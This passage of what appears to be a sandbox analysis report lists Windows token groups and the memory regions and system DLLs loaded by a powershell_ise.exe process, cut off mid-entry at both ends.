AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1368 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1369 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1370 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1371 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1372 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1373 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1374 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1375 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1376 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1377 start_va = 0x400000 end_va = 0x439fff monitored = 0 entry_point = 0x41390e region_type = mapped_file name = "powershell_ise.exe" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe") Region: id = 1378 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1379 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1380 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1381 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1382 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1383 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 1384 start_va = 0x400000 end_va = 0x439fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1386 start_va = 0x440000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1387 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1388 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1389 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1390 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1391 start_va = 0x440000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1392 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1393 start_va = 0x6f850000 end_va = 0x6f8a8fff monitored = 1 entry_point = 0x6f860780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 1394 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1395 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1396 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1397 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1398 start_va = 0x640000 end_va = 0x6fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1399 start_va = 0x700000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1400 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1401 start_va = 0x76600000 end_va = 0x7667afff monitored = 0 entry_point = 0x7661e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1402 start_va = 0x76a90000 end_va = 0x76b4dfff monitored = 0 entry_point = 0x76ac5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1403 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1404 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1405 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1406 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1407 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1408 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1409 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1410 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1411 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1412 start_va = 0x850000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1415 start_va = 0x6c430000 end_va = 0x6c4acfff monitored = 1 entry_point = 0x6c440db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 1416 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1417 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1418 start_va = 0x74ab0000 end_va = 0x74bfefff monitored = 0 entry_point = 0x74b66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1419 start_va = 0x743d0000 end_va = 0x74516fff monitored = 0 entry_point = 0x743e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1420 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1421 start_va = 0x850000 end_va = 0x9d7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1422 start_va = 0xa40000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 1423 start_va = 0x741b0000 end_va = 0x741dafff monitored = 0 entry_point = 0x741b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1424 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1425 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1426 start_va = 0xa50000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1427 start_va = 0xbe0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 1428 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1429 start_va = 0x6f840000 end_va = 0x6f847fff monitored = 0 entry_point = 0x6f8417b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1430 start_va = 0x69370000 end_va = 0x69a50fff monitored = 1 entry_point = 0x6939cd70 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 1431 start_va = 0x6a880000 end_va = 0x6a974fff monitored = 0 entry_point = 0x6a8d4160 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\SysWOW64\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll") Region: id = 1432 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1433 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1434 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 1435 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1436 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1437 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1438 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1439 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 1440 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1441 start_va = 0x1fe0000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1442 start_va = 0x2060000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1443 start_va = 0x5f0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1444 start_va = 0x2150000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 1445 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1446 start_va = 0x2250000 end_va = 0x424ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 1447 start_va = 0x2060000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1448 start_va = 0x2140000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 1449 start_va = 0x800000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1450 start_va = 0x4250000 end_va = 0x434ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004250000" filename = "" Region: id = 1451 start_va = 0x4350000 end_va = 0x4686fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1452 start_va = 0x680b0000 end_va = 0x69361fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll") Region: id = 1453 start_va = 0x74dc0000 end_va = 0x74eaafff monitored = 0 entry_point = 0x74dfd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1454 start_va = 0x4690000 end_va = 0x4720fff monitored = 0 entry_point = 0x46c8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1455 start_va = 0x73dd0000 end_va = 0x73e44fff monitored = 0 entry_point = 0x73e09a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1456 start_va = 0x4690000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 1457 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 1458 start_va = 0x9f0000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 1459 start_va = 0x69e40000 end_va = 0x69ebffff monitored = 1 entry_point = 0x69e41180 region_type = mapped_file name = "clrjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll") Region: id = 1460 start_va = 0x76680000 end_va = 0x76711fff monitored = 0 entry_point = 0x766b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1461 start_va = 0xa00000 end_va = 0xa0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 1462 start_va = 0x676e0000 end_va = 0x680abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll") Region: id = 1463 start_va = 0x69c40000 end_va = 0x69dcefff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll") Region: id = 1464 start_va = 0x66a70000 end_va = 0x676d6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll") Region: id = 1465 start_va = 0x66320000 end_va = 0x66a40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll") Region: id = 1466 start_va = 0x66220000 end_va = 0x66310fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll") Region: id = 1467 start_va = 0x65b00000 end_va = 0x6621dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll") Region: id = 1468 start_va = 0x4690000 end_va = 0x470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 1469 start_va = 0x4820000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 1470 start_va = 0x764d0000 end_va = 0x764d5fff monitored = 0 entry_point = 0x764d1460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1471 start_va = 0x5e430000 end_va = 0x5e4cbfff monitored = 1 entry_point = 0x5e4be9a6 region_type = mapped_file name = "microsoft.visualbasic.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll") Region: id = 1472 start_va = 0x4710000 end_va = 0x47abfff monitored = 1 entry_point = 0x479e9a6 region_type = mapped_file name = "microsoft.visualbasic.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\microsoft.visualbasic\\v4.0_10.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll") Region: id = 1473 start_va = 0x4830000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 1474 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1475 start_va = 0xa20000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 1476 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1477 start_va = 0xa30000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 1478 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1479 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1480 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1481 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1482 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1483 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1484 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1485 start_va = 0xa10000 end_va = 0xa1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1486 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1487 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1488 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1489 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1490 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1491 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1492 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 1493 start_va = 0x71540000 end_va = 0x7155afff monitored = 0 entry_point = 0x71549050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1494 start_va = 0x71200000 end_va = 0x71212fff monitored = 0 entry_point = 0x71209950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1495 start_va = 0x70230000 end_va = 0x7025efff monitored = 0 entry_point = 0x702495e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1496 start_va = 0x1fe0000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1497 start_va = 0x2050000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1498 start_va = 0x2100000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1499 start_va = 0x4690000 end_va = 0x46cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 1500 start_va = 0x4700000 end_va = 0x470ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1501 start_va = 0x4930000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 1502 start_va = 0x4a30000 end_va = 0x4b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 1503 start_va = 0x4b30000 end_va = 0x4c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 1504 start_va = 0xa30000 end_va = 0xa30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1505 start_va = 0x74340000 end_va = 0x743c3fff monitored = 0 entry_point = 0x74366220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1506 start_va = 0x2020000 end_va = 0x2020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 1507 start_va = 0x65ab0000 end_va = 0x65af1fff monitored = 1 entry_point = 0x65abf380 region_type = mapped_file name = "wbemdisp.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemdisp.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemdisp.dll") Region: id = 1508 start_va = 0x6aa60000 end_va = 0x6aac6fff monitored = 0 entry_point = 0x6aa7b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1509 start_va = 0x73f30000 end_va = 0x73f8efff monitored = 0 entry_point = 0x73f34af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1510 start_va = 0x6aad0000 end_va = 0x6aadcfff monitored = 0 entry_point = 0x6aad3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1511 start_va = 0x65a90000 end_va = 0x65aabfff monitored = 0 entry_point = 0x65a9aa90 region_type = mapped_file name = "wmiutils.dll" filename = 